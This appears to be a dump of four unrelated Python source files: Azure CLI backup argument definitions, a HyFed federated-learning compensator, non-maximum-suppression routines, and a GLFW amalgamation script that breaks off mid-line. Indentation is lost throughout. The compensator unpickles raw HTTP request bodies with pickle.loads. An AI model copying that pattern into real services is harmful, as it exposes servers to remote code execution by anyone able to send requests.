with self.argument_context('backup protection enable-for-azurefileshare') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('azure_file_share', options_list=['--azure-file-share'], help='Name of the Azure FileShare.')
c.argument('storage_account', options_list=['--storage-account'], help='Name of the Storage Account of the FileShare.')
for command in ["enable-for-azurewl", "auto-enable-for-azurewl", 'auto-disable-for-azurewl']:
with self.argument_context('backup protection ' + command) as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('protectable_item_type', protectable_item_type)
c.argument('protectable_item_name', protectable_item_name_type)
c.argument('server_name', options_list=['--server-name'], help='Parent Server name of the item.')
c.argument('workload_type', workload_type)
# Protectable-item
with self.argument_context('backup protectable-item') as c:
c.argument('vault_name', vault_name_type)
c.argument('workload_type', azure_workload_type)
c.argument('container_name', container_name_type)
with self.argument_context('backup protectable-item show') as c:
c.argument('vault_name', vault_name_type, id_part='name')
c.argument('name', options_list=['--name'], help='Name of the protectable item.', id_part='child_name_3')
c.argument('server_name', options_list=['--server-name'], help='Parent Server name of the item.')
c.argument('protectable_item_type', protectable_item_type)
with self.argument_context('backup protectable-item list') as c:
c.argument('server_name', options_list=['--server-name'], help='Parent Server name of the item.')
c.argument('protectable_item_type', protectable_item_type)
c.argument('backup_management_type', backup_management_type)
# Restore
# TODO: Need to use recovery_point.id once https://github.com/Azure/msrestazure-for-python/issues/80 is fixed.
with self.argument_context('backup restore') as c:
c.argument('vault_name', vault_name_type, id_part='name')
c.argument('container_name', container_name_type, id_part='child_name_2')
c.argument('item_name', item_name_type, id_part='child_name_3')
c.argument('rp_name', rp_name_type, id_part='child_name_4')
with self.argument_context('backup restore restore-disks') as c:
c.argument('storage_account', help='Name or ID of the staging storage account. The VM configuration will be restored to this storage account. See the help for --restore-to-staging-storage-account parameter for more info.')
c.argument('restore_to_staging_storage_account', arg_type=get_three_state_flag(), help='Use this flag when you want disks to be restored to the staging storage account using the --storage-account parameter. When not specified, disks will be restored to their original storage accounts. Default: false.')
c.argument('target_resource_group', options_list=['--target-resource-group', '-t'], help='Use this to specify the target resource group in which the restored disks will be saved')
c.argument('diskslist', diskslist_type)
c.argument('restore_only_osdisk', arg_type=get_three_state_flag(), help='Use this flag to restore only OS disks of a backed up VM.')
c.argument('restore_as_unmanaged_disks', arg_type=get_three_state_flag(), help='Use this flag to restore the disks as unmanaged disks.')
c.argument('use_secondary_region', action='store_true', help='Use this flag to restore from a recoverypoint in secondary region.')
c.argument('rehydration_duration', type=int, help='Set the maximum time, in days (between 10-30, both inclusive) for which the recovery point stays in hydrated state.')
c.argument('rehydration_priority', rehyd_priority_type)
c.argument('disk_encryption_set_id', options_list=['--disk-encryption-set-id'], help='ID of the disk encryption set used to encrypt the restored disks. Please ensure access to the disk encryption set specified here.')
c.argument('mi_system_assigned', action='store_true', help='Use this flag to specify whether a system-assigned managed identity should be used for the restore operation. MI option is not applicable for restoring unmanaged disks.')
c.argument('mi_user_assigned', help='ARM ID of the user-assigned managed identity to use for the restore operation. Specify a value for this parameter if you do not want to use a system-assigned MI for restoring the backup item.')
c.argument('target_zone', arg_type=get_enum_type(['1', '2', '3']), help='A primary region currently can have three Azure availability zones. Use this argument to specify the target zone number while doing Cross Zonal Restore.')
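# Example (illustrative, names are placeholders): restore the disks of a backed up VM into a
# target resource group using a staging storage account:
#   az backup restore restore-disks --resource-group MyRG --vault-name MyVault \
#       --container-name MyVM --item-name MyVM --rp-name <rp_name> \
#       --storage-account mystagingsa --target-resource-group MyTargetRG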
with self.argument_context('backup restore restore-azurefileshare') as c:
c.argument('resolve_conflict', resolve_conflict_type)
c.argument('restore_mode', restore_mode_type)
c.argument('target_file_share', options_list=['--target-file-share'], help='Destination file share to which content will be restored')
c.argument('target_folder', options_list=['--target-folder'], help='Destination folder to which content will be restored. To restore content to the root, leave the folder name empty.')
c.argument('target_storage_account', options_list=['--target-storage-account'], help='Destination storage account to which content will be restored')
with self.argument_context('backup restore restore-azurefiles') as c:
c.argument('resolve_conflict', resolve_conflict_type)
c.argument('restore_mode', restore_mode_type)
c.argument('target_file_share', options_list=['--target-file-share'], help='Destination file share to which content will be restored')
c.argument('target_folder', options_list=['--target-folder'], help='Destination folder to which content will be restored. To restore content to the root, leave the folder name empty.')
c.argument('target_storage_account', options_list=['--target-storage-account'], help='Destination storage account to which content will be restored')
c.argument('source_file_type', arg_type=get_enum_type(['File', 'Directory']), options_list=['--source-file-type'], help='Specify the source file type to be selected')
c.argument('source_file_path', options_list=['--source-file-path'], nargs='+', help="""The absolute path of the file, to be restored within the file share, as a string. This path is the same path used in the 'az storage file download' or 'az storage file show' CLI commands.""")
with self.argument_context('backup restore restore-azurewl') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('recovery_config', options_list=['--recovery-config'], help="""Specify the recovery configuration of a backed up item. The configuration object can be obtained from 'backup recoveryconfig show' command.""")
c.argument('rehydration_duration', type=int, help='Set the maximum time, in days (between 10-30, both inclusive) for which the recovery point stays in hydrated state.')
c.argument('rehydration_priority', rehyd_priority_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to restore from a recoverypoint in secondary region.')
# Recoveryconfig
with self.argument_context('backup recoveryconfig show') as c:
c.argument('container_name', container_name_type, id_part='child_name_2')
c.argument('item_name', item_name_type, id_part='child_name_3')
c.argument('restore_mode', restore_mode_workload_type)
c.argument('vault_name', vault_name_type, id_part='name')
c.argument('log_point_in_time', options_list=['--log-point-in-time'], help="""Specify the point-in-time (in UTC) which will be restored.""")
c.argument('rp_name', rp_name_type)
c.argument('target_item_name', options_list=['--target-item-name'], help="""Specify the target item name for the restore operation.""")
c.argument('target_server_type', target_server_type)
c.argument('target_server_name', options_list=['--target-server-name'], help="""Specify the parent server name of the target item.""")
c.argument('workload_type', azure_workload_type)
c.argument('target_container_name', target_container_name_type)
c.argument('from_full_rp_name', from_full_rp_type)
c.argument('filepath', filepath_type)
c.argument('backup_management_type', backup_management_type)
c.argument('target_resource_group', options_list=['--target-resource-group'], help="""Specify the resource group of target item for Cross Region Restore. Default value will be same as --resource-group if not specified.""")
c.argument('target_vault_name', options_list=['--target-vault-name'], help="""Specify the vault name of target item for Cross Region Restore. Default value will be same as --vault-name if not specified.""")
# Job
with self.argument_context('backup job') as c:
c.argument('vault_name', vault_name_type, id_part='name')
# TODO: Need to use job.id once https://github.com/Azure/msrestazure-for-python/issues/80 is fixed.
for command in ['show', 'stop', 'wait']:
with self.argument_context('backup job ' + command) as c:
c.argument('name', job_name_type, help='Name of the job. You can use the backup job list command to get the name of a job.', id_part='child_name_1')
c.argument('use_secondary_region', action='store_true', help='Use this flag to show a job in the secondary region.')
with self.argument_context('backup job list') as c:
c.argument('vault_name', vault_name_type, id_part=None)
c.argument('status', arg_type=get_enum_type(['Cancelled', 'Completed', 'CompletedWithWarnings', 'Failed', 'InProgress']), help='Status of the Job.')
c.argument('operation', arg_type=get_enum_type(['Backup', 'ConfigureBackup', 'DeleteBackupData', 'DisableBackup', 'Restore']), help='User initiated operation.')
c.argument('start_date', type=datetime_type, help='The start date of the range in UTC (d-m-Y).')
c.argument('end_date', type=datetime_type, help='The end date of the range in UTC (d-m-Y).')
c.argument('backup_management_type', extended_backup_management_type)
c.argument('use_secondary_region', action='store_true', help='Use this flag to list jobs in the secondary region.')
with self.argument_context('backup job wait') as c:
c.argument('timeout', type=int, help='Maximum time, in seconds, to wait before aborting.')
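# Example invocations these registrations are expected to back (illustrative, names are placeholders):
#   az backup job list --resource-group MyRG --vault-name MyVault --status Completed
#   az backup job wait --resource-group MyRG --vault-name MyVault --name <job_name> --timeout 3600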
|
"""
The main class to obtain the compensation parameters from the clients, aggregate them,
and share the aggregation results with the server
Copyright 2021 Reza NasiriGerdeh. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from hyfed_compensator.util.hyfed_parameters import Parameter, AuthenticationParameter, SyncParameter, ConnectionParameter, MonitoringParameter
from hyfed_compensator.util.status import OperationStatus
from hyfed_compensator.util.endpoint import EndPoint
from hyfed_compensator.util.utils import aggregate
from hyfed_compensator.util.monitoring import Timer, Counter
import pickle
import numpy as np
import time
import hashlib
import requests
from datetime import datetime
import logging
logger = logging.getLogger(__name__)
class HyFedCompensatorProject:
"""
Provide main functions to communicate with the clients and server,
and to aggregate the compensation parameters from the clients
"""
def __init__(self, project_id_hash, client_count):
""" Initialize the compensator project using the hash of the project ID and the number of clients """
# for compensator to know whether it has received compensation parameters from all clients
self.client_count = client_count
# hash of the project ID, which should be the same for all clients
self.project_id_hash = project_id_hash
# authentication parameters from the clients
self.client_token_hashes = list()
self.client_username_hashes = list()
# sync parameters from the clients
self.client_steps = list()
self.client_comm_rounds = list()
# compensation parameters (noise values) from the clients
self.client_compensation_parameters = list()
# data type parameters from clients
self.client_data_type_parameters = list()
# clients tell compensator where to send the aggregated noise values
self.server_urls = list()
# aggregated parameters have the same parameter names as the local model parameters of the clients
self.aggregated_compensation_parameters = dict()
# to tell the server whether the aggregation of noise values has been successful
self.operation_status = OperationStatus.DONE
# monitoring timers
self.computation_timer = Timer(name='Computation')
self.network_send_timer = Timer(name='Network Send')
# counter to track the traffic client -> compensator (in terms of bytes)
self.client_compensator_traffic = Counter("client->compensator")
self.upload_parameters_timeout = 600
# used for garbage collection purposes
self.last_updated_date = datetime.now().timestamp()
def add_client_parameters(self, request):
""" Append client's authentication, sync, connection, and compensation parameters to the corresponding lists """
try:
# a new communication round starts for the compensator when the parameters from the first client are received
if len(self.client_compensation_parameters) == 0:
self.computation_timer.new_round()
self.network_send_timer.new_round()
# add traffic size to client -> compensator traffic counter
traffic_size = int(request.headers['Content-Length'])
self.client_compensator_traffic.increment(traffic_size)
logger.debug(f'Project {self.project_id_hash}: {traffic_size} bytes added to client -> compensator traffic.')
self.computation_timer.start()
# extract client parameters from the request body
request_body = pickle.loads(request.body)
authentication_parameters = request_body[Parameter.AUTHENTICATION]
sync_parameters = request_body[Parameter.SYNCHRONIZATION]
compensation_parameters = request_body[Parameter.COMPENSATION]
connection_parameters = request_body[Parameter.CONNECTION]
data_type_parameters = request_body[Parameter.DATA_TYPE]
# authentication parameters
hash_username = authentication_parameters[AuthenticationParameter.HASH_USERNAME]
hash_token = authentication_parameters[AuthenticationParameter.HASH_TOKEN]
# sync parameters
step = sync_parameters[SyncParameter.PROJECT_STEP]
comm_round = sync_parameters[SyncParameter.COMM_ROUND]
# connection parameter
server_url = connection_parameters[ConnectionParameter.SERVER_URL]
# add the parameters to the lists
self.client_username_hashes.append(hash_username)
self.client_token_hashes.append(hash_token)
self.client_steps.append(step)
self.client_comm_rounds.append(comm_round)
self.server_urls.append(server_url)
self.client_compensation_parameters.append(compensation_parameters)
self.client_data_type_parameters.append(data_type_parameters)
self.computation_timer.stop()
logger.debug(f'Project {self.project_id_hash}: Client parameters added!')
except Exception as add_parameter_exp:
logger.error(f'Project {self.project_id_hash}: Adding client parameters failed!')
logger.error(f'Project {self.project_id_hash}: The exception is: {add_parameter_exp}')
self.computation_timer.stop()
self.set_operation_status_failed()
def aggregate_client_parameters(self):
""" Aggregate client parameters including the compensation parameters from all clients """
try:
self.computation_timer.start()
logger.debug(f"Project {self.project_id_hash}: Aggregating client parameters ...")
# make sure all clients are in the same step and communication round
if not self.is_client_sync_ok():
logger.error(f'Project {self.project_id_hash}: The step/comm_round of the clients are different!')
self.computation_timer.stop()
self.set_operation_status_failed()
return
# ensure all clients are coordinated by the same server
if not self.is_server_url_same():
logger.error(f'Project {self.project_id_hash}: Server URL is different for the clients!')
self.computation_timer.stop()
self.set_operation_status_failed()
return
# make sure compensator parameter names are the same across the clients
if not self.is_client_compensation_parameters_ok():
logger.error(f'Project {self.project_id_hash}: Compensation parameter names are different across clients!')
self.computation_timer.stop()
self.set_operation_status_failed()
return
# aggregate the compensation parameters
for parameter_name in self.client_compensation_parameters[0].keys():
compensation_values = self.compensation_parameter_to_list(parameter_name)
parameter_data_type = self.client_data_type_parameters[0][parameter_name]
aggregated_compensation_value = aggregate(compensation_values, parameter_data_type)
self.aggregated_compensation_parameters[parameter_name] = -aggregated_compensation_value
self.computation_timer.stop()
except Exception as aggregate_exp:
logger.error(f'Project {self.project_id_hash}: Aggregating the compensation parameters failed!')
logger.error(f'Project {self.project_id_hash}: The exception is: {aggregate_exp}')
self.computation_timer.stop()
self.set_operation_status_failed()
def send_to_server(self):
""" Send aggregated authentication, sync, monitoring, and compensation parameters to the server """
# create and serialize request body
parameters_serialized = self.prepare_server_parameters()
max_tries = 10
for _ in range(max_tries):
try:
logger.debug(f"Project {self.project_id_hash}: Sending the aggregated parameters to the server ...")
self.network_send_timer.start()
response = requests.post(url=f'{self.server_urls[0]}/{EndPoint.MODEL_COMPENSATION}',
data=parameters_serialized,
timeout=self.upload_parameters_timeout)
if response.status_code == 200:
logger.debug(f"Project {self.project_id_hash}: Sending done!")
self.network_send_timer.stop()
return
logger.error(f"Project {self.project_id_hash}: Sending failed, got {response.status_code} status code from the server!")
self.network_send_timer.stop()
time.sleep(30)
continue
except Exception as send_server_exp:
logger.error(f"Project {self.project_id_hash}: Sending failed!")
logger.error(f'Project {self.project_id_hash}: The exception is: {send_server_exp}')
self.network_send_timer.stop()
time.sleep(30)
def aggregate_and_send(self):
""" First aggregate, and then, send aggregated parameters to the server """
# aggregate client parameters including compensation parameters
self.aggregate_client_parameters()
# send the aggregated parameters to the server
self.send_to_server()
# empty the lists/dictionaries for the next round
self.client_token_hashes = list()
self.client_username_hashes = list()
self.client_steps = list()
self.client_comm_rounds = list()
self.client_compensation_parameters = list()
self.client_data_type_parameters = list()
self.server_urls = list()
self.aggregated_compensation_parameters = dict()
# ########## setter/getter functions
def set_operation_status_done(self):
""" If current operation is still in progress (not failed), then set it to Done """
if self.operation_status == OperationStatus.IN_PROGRESS:
self.operation_status = OperationStatus.DONE
def set_operation_status_in_progress(self):
""" If previous operation is done (not failed), then set current operation status to In Progress """
if self.operation_status == OperationStatus.DONE:
self.operation_status = OperationStatus.IN_PROGRESS
def set_operation_status_failed(self):
""" Regardless of the current status, set the operation status to Failed """
logger.error("Operation failed!")
self.operation_status = OperationStatus.FAILED
def set_last_updated_date(self):
self.last_updated_date = datetime.now().timestamp()
def is_operation_failed(self):
return self.operation_status == OperationStatus.FAILED
def get_last_updated_date(self):
return self.last_updated_date
# ########## Helper functions
def is_client_sync_ok(self):
""" Ensure the project step and communication round of all clients is the same """
try:
logger.debug(f"Project {self.project_id_hash}: checking synchronization status of the clients ...")
return (np.all(np.array(self.client_steps) == self.client_steps[0]) and
np.all(np.array(self.client_comm_rounds) == self.client_comm_rounds[0]))
except Exception as sync_exp:
logger.error(f'Project {self.project_id_hash}: Checking the sync status of the clients failed!')
logger.error(f'Project {self.project_id_hash}: The exception is: {sync_exp}')
return False
def is_server_url_same(self):
""" Ensure the the server urls from all clients are the same """
try:
logger.debug(f"Project {self.project_id_hash}: Checking whether clients are coordinated by the same server ...")
return np.all(np.array(self.server_urls) == self.server_urls[0])
except Exception as server_url_exp:
logger.error(f'Project {self.project_id_hash}: Checking server URLs failed!')
logger.error(f'Project {self.project_id_hash}: The exception is: {server_url_exp}')
return False
def is_client_compensation_parameters_ok(self):
""" Make sure the names of the compensation parameters are consistent across clients """
try:
logger.debug(f"Project {self.project_id_hash}: checking whether compensation parameter names are consistent across all clients ...")
client1_compensation_parameter_names = self.client_compensation_parameters[0].keys()
for client_parameters in self.client_compensation_parameters:
if client_parameters.keys() != client1_compensation_parameter_names:
return False
return True
except Exception as compensation_param_exp:
logger.error(f'Project {self.project_id_hash}: Checking compensation parameter names failed!')
logger.error(f'Project {self.project_id_hash}: The exception is: {compensation_param_exp}')
return False
def is_client_data_type_parameters_ok(self):
""" Make sure the names of the data type parameters are consistent across clients """
try:
logger.debug(f"Project {self.project_id_hash}: checking whether data type parameter names are consistent across all clients ...")
client1_data_type_parameter_names = self.client_data_type_parameters[0].keys()
for client_parameters in self.client_data_type_parameters:
if client_parameters.keys() != client1_data_type_parameter_names:
return False
return True
except Exception as compensation_param_exp:
logger.error(f'Project {self.project_id_hash}: Checking data type parameter names failed!')
logger.error(f'Project {self.project_id_hash}: The exception is: {compensation_param_exp}')
return False
def should_aggregate_and_send(self):
""" Check whether compensation parameters from all clients received """
return len(self.client_username_hashes) == self.client_count
def compensation_parameter_to_list(self, parameter_name):
"""
Extract the compensation parameter of the clients specified with parameter_name as a list
"""
compensation_parameter_list = []
try:
for compensation_parameter in self.client_compensation_parameters:
compensation_parameter_list.append(compensation_parameter[parameter_name])
except Exception as convert_exp:
logger.error(f'Project {self.project_id_hash}: Converting compensation parameters to a list failed!')
logger.error(f'Project {self.project_id_hash}: The exception is: {convert_exp}')
self.set_operation_status_failed()
return compensation_parameter_list
def prepare_server_parameters(self):
""" Prepare the parameters shared with the server """
try:
self.computation_timer.start()
# initialize authentication parameters
authentication_parameters = dict()
hash_username_hashes = hashlib.sha256(''.join(sorted(self.client_username_hashes)).encode('utf-8')).hexdigest()
hash_token_hashes = hashlib.sha256(''.join(sorted(self.client_token_hashes)).encode('utf-8')).hexdigest()
authentication_parameters[AuthenticationParameter.HASH_PROJECT_ID] = self.project_id_hash
authentication_parameters[AuthenticationParameter.HASH_USERNAME_HASHES] = hash_username_hashes
authentication_parameters[AuthenticationParameter.HASH_TOKEN_HASHES] = hash_token_hashes
# initialize synchronization parameters
sync_parameters = dict()
sync_parameters[SyncParameter.PROJECT_STEP] = self.client_steps[0]
sync_parameters[SyncParameter.COMM_ROUND] = self.client_comm_rounds[0]
sync_parameters[SyncParameter.OPERATION_STATUS] = self.operation_status
monitoring_parameters = dict()
monitoring_parameters[MonitoringParameter.COMPUTATION_TIME] = self.computation_timer.get_total_duration()
monitoring_parameters[MonitoringParameter.NETWORK_SEND_TIME] = self.network_send_timer.get_total_duration()
monitoring_parameters[MonitoringParameter.CLIENT_COMPENSATOR_TRAFFIC] = self.client_compensator_traffic.total_count
# server parameters in json
server_parameters_json = {Parameter.AUTHENTICATION: authentication_parameters,
Parameter.SYNCHRONIZATION: sync_parameters,
Parameter.MONITORING: monitoring_parameters,
Parameter.COMPENSATION: self.aggregated_compensation_parameters
}
server_parameters_serialized = pickle.dumps(server_parameters_json)
self.computation_timer.stop()
return server_parameters_serialized
except Exception as prepare_exp:
logger.error(f'Project {self.project_id_hash}: Preparing server parameters failed!')
logger.error(f'Project {self.project_id_hash}: The exception is: {prepare_exp}')
self.computation_timer.stop()
self.set_operation_status_failed()
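# Illustrative usage sketch (not part of the original module): how a request handler might drive a
# HyFedCompensatorProject instance; 'request' is assumed to be an HTTP request whose pickled body
# was produced by a HyFed client.
#
#   project = HyFedCompensatorProject(project_id_hash, client_count=3)
#   project.add_client_parameters(request)
#   project.set_last_updated_date()
#   if project.should_aggregate_and_send():
#       project.aggregate_and_send()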
|
import math
from pathlib import Path
import numba
import numpy as np
from spconv.spconv_utils import (
non_max_suppression_cpu, rotate_non_max_suppression_cpu)
from second.core import box_np_ops
from second.core.non_max_suppression.nms_gpu import rotate_iou_gpu
def nms_cc(dets, thresh):
scores = dets[:, 4]
order = scores.argsort()[::-1].astype(np.int32) # highest->lowest
return non_max_suppression_cpu(dets, order, thresh, 1.0)
def rotate_nms_cc(dets, thresh):
scores = dets[:, 5]
order = scores.argsort()[::-1].astype(np.int32) # highest->lowest
dets_corners = box_np_ops.center_to_corner_box2d(dets[:, :2], dets[:, 2:4],
dets[:, 4])
dets_standup = box_np_ops.corner_to_standup_nd(dets_corners)
standup_iou = box_np_ops.iou_jit(dets_standup, dets_standup, eps=0.0)
# print(dets_corners.shape, order.shape, standup_iou.shape)
return rotate_non_max_suppression_cpu(dets_corners, order, standup_iou,
thresh)
@numba.jit(nopython=True)
def nms_jit(dets, thresh, eps=0.0):
x1 = dets[:, 0]
y1 = dets[:, 1]
x2 = dets[:, 2]
y2 = dets[:, 3]
scores = dets[:, 4]
areas = (x2 - x1 + eps) * (y2 - y1 + eps)
order = scores.argsort()[::-1].astype(np.int32) # highest->lowest
ndets = dets.shape[0]
suppressed = np.zeros((ndets), dtype=np.int32)
keep = []
for _i in range(ndets):
i = order[_i] # start with highest score box
if suppressed[i] == 1:  # skip boxes already suppressed by a higher-scoring overlapping box
continue
keep.append(i)
for _j in range(_i + 1, ndets):
j = order[_j]
if suppressed[j] == 1:
continue
# calculate iou between i and j box
w = max(min(x2[i], x2[j]) - max(x1[i], x1[j]) + eps, 0.0)
h = max(min(y2[i], y2[j]) - max(y1[i], y1[j]) + eps, 0.0)
inter = w * h
ovr = inter / (areas[i] + areas[j] - inter)
# ovr = inter / areas[j]
if ovr >= thresh:
suppressed[j] = 1
return keep
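# soft_nms_jit implements Soft-NMS: instead of discarding every box that overlaps the current
# maximum, it decays the overlapping box's score (method 1 = linear penalty, method 2 = Gaussian
# penalty scaled by sigma, any other value = classic hard NMS with IoU threshold Nt). Boxes whose
# decayed score drops below `threshold` are swapped to the end and N shrinks; `boxes` is modified
# in place and the indices of the surviving boxes are returned.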
@numba.jit('float32[:, :], float32, float32, float32, uint32', nopython=True)
def soft_nms_jit(boxes, sigma=0.5, Nt=0.3, threshold=0.001, method=0):
N = boxes.shape[0]
pos = 0
maxscore = 0
maxpos = 0
for i in range(N):
maxscore = boxes[i, 4]
maxpos = i
tx1 = boxes[i, 0]
ty1 = boxes[i, 1]
tx2 = boxes[i, 2]
ty2 = boxes[i, 3]
ts = boxes[i, 4]
pos = i + 1
# get max box
while pos < N:
if maxscore < boxes[pos, 4]:
maxscore = boxes[pos, 4]
maxpos = pos
pos = pos + 1
# add max box as a detection
boxes[i, 0] = boxes[maxpos, 0]
boxes[i, 1] = boxes[maxpos, 1]
boxes[i, 2] = boxes[maxpos, 2]
boxes[i, 3] = boxes[maxpos, 3]
boxes[i, 4] = boxes[maxpos, 4]
# swap ith box with position of max box
boxes[maxpos, 0] = tx1
boxes[maxpos, 1] = ty1
boxes[maxpos, 2] = tx2
boxes[maxpos, 3] = ty2
boxes[maxpos, 4] = ts
tx1 = boxes[i, 0]
ty1 = boxes[i, 1]
tx2 = boxes[i, 2]
ty2 = boxes[i, 3]
ts = boxes[i, 4]
pos = i + 1
# NMS iterations, note that N changes if detection boxes fall below threshold
while pos < N:
x1 = boxes[pos, 0]
y1 = boxes[pos, 1]
x2 = boxes[pos, 2]
y2 = boxes[pos, 3]
s = boxes[pos, 4]
area = (x2 - x1 + 1) * (y2 - y1 + 1)
iw = (min(tx2, x2) - max(tx1, x1) + 1)
if iw > 0:
ih = (min(ty2, y2) - max(ty1, y1) + 1)
if ih > 0:
ua = float((tx2 - tx1 + 1) * (ty2 - ty1 + 1) + area -
iw * ih)
ov = iw * ih / ua #iou between max box and detection box
if method == 1: # linear
if ov > Nt:
weight = 1 - ov
else:
weight = 1
elif method == 2: # gaussian
weight = np.exp(-(ov * ov) / sigma)
else: # original NMS
if ov > Nt:
weight = 0
else:
weight = 1
boxes[pos, 4] = weight * boxes[pos, 4]
# if box score falls below threshold, discard the box by swapping with last box
# update N
if boxes[pos, 4] < threshold:
boxes[pos, 0] = boxes[N - 1, 0]
boxes[pos, 1] = boxes[N - 1, 1]
boxes[pos, 2] = boxes[N - 1, 2]
boxes[pos, 3] = boxes[N - 1, 3]
boxes[pos, 4] = boxes[N - 1, 4]
N = N - 1
pos = pos - 1
pos = pos + 1
keep = [i for i in range(N)]
return keep
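# Minimal usage sketch (illustrative, not part of the original module): run nms_jit on a tiny
# hand-made set of axis-aligned boxes given as [x1, y1, x2, y2, score] rows.
if __name__ == "__main__":
    demo_dets = np.array([[0.0, 0.0, 10.0, 10.0, 0.9],
                          [1.0, 1.0, 11.0, 11.0, 0.8],
                          [50.0, 50.0, 60.0, 60.0, 0.7]])
    # Boxes 0 and 1 overlap with IoU ~0.68, so box 1 is suppressed; box 2 does not overlap at all.
    print(nms_jit(demo_dets, 0.5))  # expected: [0, 2]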
|
import os
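# Single-file amalgamation generator for GLFW: the lists below enumerate the per-platform headers
# and sources under ./glfw/src, which are inlined (wrapped in header guards) into
# ./generated-single-header/glfw.h and ./generated-single-header-and-source/{glfw.h, glfw.c}.
# Run this script from the directory that contains the ./glfw checkout.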
win32_defines = ["#define _GLFW_WIN32 1",
"#ifdef _MSC_VER\n#define _CRT_SECURE_NO_WARNINGS\n#endif",
"#define LSH_GLFW_USE_HYBRID_HPG",
"#ifdef LSH_GLFW_USE_HYBRID_HPG\n#define _GLFW_USE_HYBRID_HPG 1\n#endif",
"#define _UNICODE",
"#ifdef MINGW\n#define UNICODE\n#define WINVER 0x0501\n#endif", ]
win32_headers = [ "internal.h", "mappings.h", "win32_platform.h", "win32_joystick.h", "wgl_context.h", "egl_context.h", "osmesa_context.h", ]
win32_sources = [ "win32_init.c", "win32_joystick.c", "win32_monitor.c", "win32_time.c", "win32_thread.c", "win32_window.c", "wgl_context.c", "egl_context.c", "osmesa_context.c", ]
osmesa_headers = [ "internal.h", "mappings.h","null_platform.h", "null_joystick.h", "posix_time.h", "posix_thread.h", "osmesa_context.h", ]
osmesa_sources = [ "null_init.c", "null_monitor.c", "null_window.c", "null_joystick.c", "posix_time.c", "posix_thread.c", "osmesa_context.c", ]
x11_headers = [ "internal.h", "mappings.h", "x11_platform.h", "xkb_unicode.h", "posix_time.h", "posix_thread.h", "glx_context.h", "egl_context.h", "osmesa_context.h", "linux_joystick.h", ]
x11_sources = [ "x11_init.c", "x11_monitor.c", "x11_window.c", "xkb_unicode.c", "posix_time.c", "posix_thread.c", "glx_context.c", "egl_context.c", "osmesa_context.c", "linux_joystick.c", ]
wayland_headers = [ "internal.h", "mappings.h", "wl_platform.h", "posix_time.h", "posix_thread.h", "xkb_unicode.h", "egl_context.h", "osmesa_context.h", "linux_joystick.h", ]
wayland_sources = [ "wl_init.c", "wl_monitor.c", "wl_window.c", "posix_time.c", "posix_thread.c", "xkb_unicode.c", "egl_context.c", "osmesa_context.c", "linux_joystick.c", ]
cocoa_headers = [ "internal.h", "mappings.h", "cocoa_platform.h", "cocoa_joystick.h", "posix_thread.h", "nsgl_context.h", "egl_context.h", "osmesa_context.h", ]
cocoa_sources = [ "cocoa_init.m", "cocoa_joystick.m", "cocoa_monitor.m", "cocoa_window.m", "cocoa_time.c", "posix_thread.c", "nsgl_context.m", "egl_context.c", "osmesa_context.c", ]
all_headers = list(set(win32_headers + osmesa_headers + x11_headers + wayland_headers + cocoa_headers))
shared_sources = [ "context.c", "init.c", "input.c", "monitor.c", "vulkan.c", "window.c", ]
# Read source files through this function so repeated reads are served from the cache
files_cache = {}
def lsh_get_file(it: str) -> str:
global files_cache
if it in files_cache.keys():
return files_cache[it]
guard = f"HEADER_GUARD_{it.replace('.', '_').upper()}"
code = open(f"./glfw/src/{it}").read()
files_cache[it] = f"\n#ifndef {guard}\n#define {guard}\n{code}\n#endif\n"
return files_cache[it]
# Include the headers into a source
def include_headers(headers, source: str) -> str:
if len(headers) == 0:
return source
for it in headers:
if source.find(f"#include \"{it}\"") != -1:
h = include_headers([i for i in headers if i != it], lsh_get_file(it))
source = source.replace(f"#include \"{it}\"", f"\n{h}\n")
return source
# Add shared code
shared_source_result = ""
for it in shared_sources:
shared_source_result += include_headers(all_headers, lsh_get_file(it))
# Add win32 code
win32_source_result = "\n#if defined _WIN32 || defined LSH_GLFW_WIN32\n"
for it in win32_defines:
win32_source_result += "\n" + it + "\n"
for it in win32_sources:
win32_source_result += include_headers(all_headers, lsh_get_file(it))
win32_source_result += "\n#endif\n"
# Add osmesa code
osmesa_source_result = "\n#ifdef LSH_GLFW_OSMESA\n"
for it in osmesa_sources:
osmesa_source_result += include_headers(all_headers, lsh_get_file(it))
osmesa_source_result += "\n#endif\n"
# Add x11 code
x11_source_result = "\n#ifdef LSH_GLFW_X11\n"
for it in x11_sources:
x11_source_result += include_headers(all_headers, lsh_get_file(it))
x11_source_result += "\n#endif\n"
# Add wayland code
wayland_source_result = "\n#ifdef LSH_GLFW_WAYLAND\n"
for it in wayland_sources:
wayland_source_result += include_headers(all_headers, lsh_get_file(it))
wayland_source_result += "\n#endif\n"
# Add cocoa code
cocoa_source_result = "\n#if defined LSH_GLFW_COCOA || defined __APPLE__\n"
for it in cocoa_sources:
cocoa_source_result += include_headers(all_headers, lsh_get_file(it))
cocoa_source_result += "\n#endif\n"
# Get the glfw headers
headers_result = open("./glfw/include/GLFW/glfw3.h").read() + "\n" + open("./glfw/include/GLFW/glfw3native.h").read() + "\n"
# Add single header
source_result = "\n#ifdef LSH_GLFW_IMPLEMENTATION\n"
source_result += win32_source_result + osmesa_source_result + x11_source_result + wayland_source_result + cocoa_source_result + shared_source_result
source_result += "\n#endif\n"
# Comment out options macro error
source_result = source_result.replace("#error \"You must not define any header option macros when compiling GLFW\"",
"//#error \"You must not define any header option macros when compiling GLFW\"")
# for it in win32_headers + osmesa_headers + x11_headers + wayland_headers + cocoa_headers:
# source_result = source_result.replace(f"#include \"{it}\"", f"//#include \"{it}\"")
source_result = source_result.replace("#include \"../include/GLFW/glfw3.h\"", "//#include \"../include/GLFW/glfw3.h\"")
# Make dirs
if not os.path.exists("./generated-single-header"):
os.makedirs("./generated-single-header")
if not os.path.exists("./generated-single-header-and-source"):
os.makedirs("./generated-single-header-and-source")
# Make single header
open("./generated-single-header/glfw.h", "w+").write(headers_result + source_result)
# Make single header + single source
open("./generated-single-header-and-source/glfw.h", "w+").write(headers_result)
open("./generated-single-header-and-source/glfw.c", "w+").write(
